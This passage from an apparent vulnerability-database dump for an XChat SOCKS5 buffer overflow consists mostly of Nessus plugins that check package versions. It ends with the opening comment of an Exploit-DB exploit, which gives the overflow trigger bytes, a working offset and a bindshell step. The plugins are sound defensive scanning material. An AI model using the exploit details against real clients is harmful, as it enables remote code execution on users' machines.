formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n#\n#\n\ninclude('compat.inc');\n\nif ( description )\n{\n script_id(12624);\n script_version(\"$Revision: 1.9 $\");\n script_cve_id(\"CVE-2004-0409\");\n\n script_name(english:\"FreeBSD : xchat remotely exploitable buffer overflow (Socks5) (204)\");\n\nscript_set_attribute(attribute:'synopsis', value: 'The remote host is missing a security update');\nscript_set_attribute(attribute:'description', value:'The following package needs to be updated: xchat2');\nscript_set_attribute(attribute: 'cvss_vector', value: 'CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P');\nscript_set_attribute(attribute:'solution', value: 'Update the package on the remote host');\nscript_set_attribute(attribute: 'see_also', value: 'http://aluigi.altervista.org/adv/live555x-adv.txt\nhttp://www.mozilla.org/projects/security/known-vulnerabilities.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-01.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-02.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-03.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-04.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-05.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-06.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-07.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-08.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-09.html\nhttp://www.mozilla.org/security/announce/mfsa2005-47.html\nhttp://xchat.org/files/source/2.0/patches/xc208-fixsocks5.diff');\nscript_set_attribute(attribute:'see_also', value: 'http://www.FreeBSD.org/ports/portaudit/8338a20f-9573-11d8-9366-0020ed76ef5a.html');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/06\");\n script_end_attributes();\n script_summary(english:\"Check for xchat2\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2010 Tenable Network Security, Inc.\");\n family[\"english\"] = \"FreeBSD Local Security Checks\";\n script_family(english:family[\"english\"]);\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/FreeBSD/pkg_info\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #37503 (freebsd_pkg_8338a20f957311d893660020ed76ef5a.nasl) instead.\");\n\nglobal_var cvss_score;\ncvss_score=7;\ninclude('freebsd_package.inc');\n\n\npkg_test(pkg:\"xchat2>=1.8<2.0.8_2\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-01-07T11:51:21", "description": "A remotely exploitable vulnerability was discovered in the Socks-5\nproxy code in XChat. By default, socks5 traversal is disabled, and one\nwould also need to connect to an attacker's own custom proxy server in\norder for this to be exploited. Successful exploitation could lead to\narbitrary code execution as the user running XChat.\n\nThe provided packages are patched to prevent this problem.", "edition": 25, "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : xchat (MDKSA-2004:036)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0409"], "modified": "2004-07-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:xchat", "cpe:/o:mandrakesoft:mandrake_linux:10.0", "p-cpe:/a:mandriva:linux:xchat-python", "cpe:/o:mandrakesoft:mandrake_linux:9.2", "p-cpe:/a:mandriva:linux:xchat-tcl", "p-cpe:/a:mandriva:linux:xchat-perl"], "id": "MANDRAKE_MDKSA-2004-036.NASL", "href": "https://www.tenable.com/plugins/nessus/14135", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2004:036. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14135);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0409\");\n script_xref(name:\"MDKSA\", value:\"2004:036\");\n\n script_name(english:\"Mandrake Linux Security Advisory : xchat (MDKSA-2004:036)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A remotely exploitable vulnerability was discovered in the Socks-5\nproxy code in XChat. By default, socks5 traversal is disabled, and one\nwould also need to connect to an attacker's own custom proxy server in\norder for this to be exploited. Successful exploitation could lead to\narbitrary code execution as the user running XChat.\n\nThe provided packages are patched to prevent this problem.\"\n );\n # http://mail.nl.linux.org/xchat-announce/2004-04/msg00000.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?591f5f7f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xchat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xchat-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xchat-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xchat-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"xchat-2.0.7-6.1.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"xchat-perl-2.0.7-6.1.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"xchat-python-2.0.7-6.1.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"xchat-tcl-2.0.7-6.1.100mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", reference:\"xchat-2.0.4-7.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"xchat-perl-2.0.4-7.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"xchat-python-2.0.4-7.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"xchat-tcl-2.0.4-7.1.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:51:49", "description": "The remote host is affected by the vulnerability described in GLSA-200404-15\n(XChat 2.0.x SOCKS5 Vulnerability)\n\n The SOCKS 5 proxy code in XChat is vulnerable to a remote exploit.\n Users would have to be using XChat through a SOCKS 5 server, enable\n SOCKS 5 traversal which is disabled by default and also connect to an\n attacker's custom proxy server.\n \nImpact :\n\n This vulnerability may allow an attacker to run arbitrary code within\n the context of the user ID of the XChat client.\n \nWorkaround :\n\n A workaround is not currently known for this issue. All users are\n advised to upgrade to the latest version of the affected package.", "edition": 24, "published": "2004-08-30T00:00:00", "title": "GLSA-200404-15 : XChat 2.0.x SOCKS5 Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0409"], "modified": "2004-08-30T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:xchat", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200404-15.NASL", "href": "https://www.tenable.com/plugins/nessus/14480", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200404-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14480);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0409\");\n script_xref(name:\"GLSA\", value:\"200404-15\");\n\n script_name(english:\"GLSA-200404-15 : XChat 2.0.x SOCKS5 Vulnerability\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200404-15\n(XChat 2.0.x SOCKS5 Vulnerability)\n\n The SOCKS 5 proxy code in XChat is vulnerable to a remote exploit.\n Users would have to be using XChat through a SOCKS 5 server, enable\n SOCKS 5 traversal which is disabled by default and also connect to an\n attacker's custom proxy server.\n \nImpact :\n\n This vulnerability may allow an attacker to run arbitrary code within\n the context of the user ID of the XChat client.\n \nWorkaround :\n\n A workaround is not currently known for this issue. All users are\n advised to upgrade to the latest version of the affected package.\"\n );\n # http://mail.nl.linux.org/xchat-announce/2004-04/msg00000.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?591f5f7f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200404-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All XChat users should upgrade to the latest stable version:\n # emerge sync\n # emerge -pv '>=net-irc/xchat-2.0.8-r1'\n # emerge '>=net-irc/xchat-2.0.8-r1'\n Note that users of the gtk1 version of xchat (1.8.*) should upgrade to\n xchat-1.8.11-r1:\n # emerge sync\n # emerge -pv '=net-irc/xchat-1.8.11-r1'\n # emerge '=net-irc/xchat-1.8.11-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:xchat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-irc/xchat\", unaffected:make_list(\"ge 2.0.8-r1\"), vulnerable:make_list(\"lt 2.0.8-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"net-irc/xchat\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:05:21", "description": "An updated xchat package that fixes a stack-based buffer overflow in\nthe SOCKSv5 proxy code.\n\nX-Chat is a graphical IRC chat client for the X Window System.\n\nA stack-based buffer overflow has been fixed in the SOCKSv5 proxy\ncode. An attacker could create a malicious SOCKSv5 proxy server in\nsuch a way that X-Chat would execute arbitrary code if a victim\nconfigured X-Chat to use the proxy. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CVE-2004-0409\nto this issue.\n\nUsers of X-Chat should upgrade to this erratum package, which contains\na backported security patch, and is not vulnerable to this issue.", "edition": 26, "published": "2004-11-04T00:00:00", "title": "RHEL 2.1 / 3 : xchat (RHSA-2004:585)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0409"], "modified": "2004-11-04T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:xchat"], "id": "REDHAT-RHSA-2004-585.NASL", "href": "https://www.tenable.com/plugins/nessus/15633", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:585. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15633);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0409\");\n script_xref(name:\"RHSA\", value:\"2004:585\");\n\n script_name(english:\"RHEL 2.1 / 3 : xchat (RHSA-2004:585)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated xchat package that fixes a stack-based buffer overflow in\nthe SOCKSv5 proxy code.\n\nX-Chat is a graphical IRC chat client for the X Window System.\n\nA stack-based buffer overflow has been fixed in the SOCKSv5 proxy\ncode. An attacker could create a malicious SOCKSv5 proxy server in\nsuch a way that X-Chat would execute arbitrary code if a victim\nconfigured X-Chat to use the proxy. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CVE-2004-0409\nto this issue.\n\nUsers of X-Chat should upgrade to this erratum package, which contains\na backported security patch, and is not vulnerable to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0409\"\n );\n # http://mail.nl.linux.org/xchat-announce/2004-04/msg00000.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?591f5f7f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2004:585\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xchat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xchat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/11/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(2\\.1|3)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1 / 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:585\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"xchat-1.8.9-1.21as.2\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"xchat-2.0.4-4.EL\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xchat\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:46:41", "description": "A straightforward stack-based buffer overflow exists in XChat's Socks5 proxy\nsupport.\n\nThe XChat developers report that `tsifra' discovered this issue.\n\nNOTE: XChat Socks5 support is disabled by support in the FreeBSD Ports\nCollection.", "edition": 26, "published": "2009-04-23T00:00:00", "title": "FreeBSD : xchat remotely exploitable buffer overflow (Socks5) (8338a20f-9573-11d8-9366-0020ed76ef5a)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0409"], "modified": "2009-04-23T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:xchat2"], "id": "FREEBSD_PKG_8338A20F957311D893660020ED76EF5A.NASL", "href": "https://www.tenable.com/plugins/nessus/37503", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(37503);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0409\");\n\n script_name(english:\"FreeBSD : xchat remotely exploitable buffer overflow (Socks5) (8338a20f-9573-11d8-9366-0020ed76ef5a)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A straightforward stack-based buffer overflow exists in XChat's Socks5 proxy\nsupport.\n\nThe XChat developers report that `tsifra' discovered this issue.\n\nNOTE: XChat Socks5 support is disabled by support in the FreeBSD Ports\nCollection.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://xchat.org/files/source/2.0/patches/xc208-fixsocks5.diff\"\n );\n # http://marc.theaimsgroup.com/?l=xchat-announce&m=108114935507357\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=xchat-announce&m=108114935507357\"\n );\n # https://vuxml.freebsd.org/freebsd/8338a20f-9573-11d8-9366-0020ed76ef5a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fe1a9d02\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:xchat2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/04/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/04/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"xchat2>=1.8<2.0.8_2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T12:07:08", "description": "XChat 1.8.0/2.0.8 socks5 Remote Buffer overflow Exploit. CVE-2004-0409. Remote exploit for linux platform", "published": "2004-05-05T00:00:00", "type": "exploitdb", "title": "XChat 1.8.0/2.0.8 socks5 - Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0409"], "modified": "2004-05-05T00:00:00", "id": "EDB-ID:296", "href": "https://www.exploit-db.com/exploits/296/", "sourceData": "/*[ X-Chat[v1.8.0 - v2.0.8]: socks-5 remote buffer overflow exploit. ] *\r\n * *\r\n * by: vade79/v9 v9 fakehalo deadpig org (fakehalo/realhalo) *\r\n * *\r\n * X-Chat homepage: *\r\n * http://www.xchat.org *\r\n * *\r\n * compile: *\r\n * cc xxchat-socks5.c -o xxchat-socks5 *\r\n * *\r\n * trigger bug/workings(X-Chat socks-5 comminucation): *\r\n * 0x05,0x00 *\r\n * 0x05,0x00,0x00,0x03 *\r\n * 0x?? (the size of the following \"data\", 255MAX(char/int8)) *\r\n * 0x??,0x??,0x?? ... (\"data\") *\r\n * *\r\n * ie. \"\\x05\\x00\\x05\\x00\\x00\\x03\\xffxxxxxxxxxxxxxxxxxxxxxxxxxxxx...\" *\r\n * *\r\n * the \"data\", limited by the previous byte, is then copied into a *\r\n * 10 byte buffer labeled buf[]. the idea is to set the size of *\r\n * the incoming data to a larger size than expected(ie. 0xff/255MAX), *\r\n * followed by sending that amount of data to exceed the 10 byte *\r\n * buffer boundary and overwrite memory addresses(stack based). *\r\n * *\r\n * the problem with the size limit is that it is defined in one *\r\n * character(char/int8), making a maximum of up to 255 bytes to be *\r\n * written to buf[]. so, this only leaves about ~100+ nops breathing *\r\n * room per offset. another problem is that the location of the *\r\n * shellcode depends on where/what X-Chat has already done. those *\r\n * two things together make for a very unpractical \"in the wild\" *\r\n * exploit scenario. *\r\n * *\r\n * i just saw several cryptic advisories about this bug, so i figured *\r\n * i would look into it and see exactly what it was. *\r\n * *\r\n * if X-Chat attempts to connect to a server(through socks-5) *\r\n * immediately upon the start of X-Chat(\"autoconnect\") it will make *\r\n * the shellcode location a bit easier to find. on both source *\r\n * compiled version 1.8.0(on rh7.1) and mandrake's rpm static binary *\r\n * version 2.0.5(on mdk9.1) an offset of 2600 worked. *\r\n * *\r\n * note: the first thing that is sent to the bindshell, upon *\r\n * successful exploitation, is \"killall -9 xchat\". this will kill *\r\n * 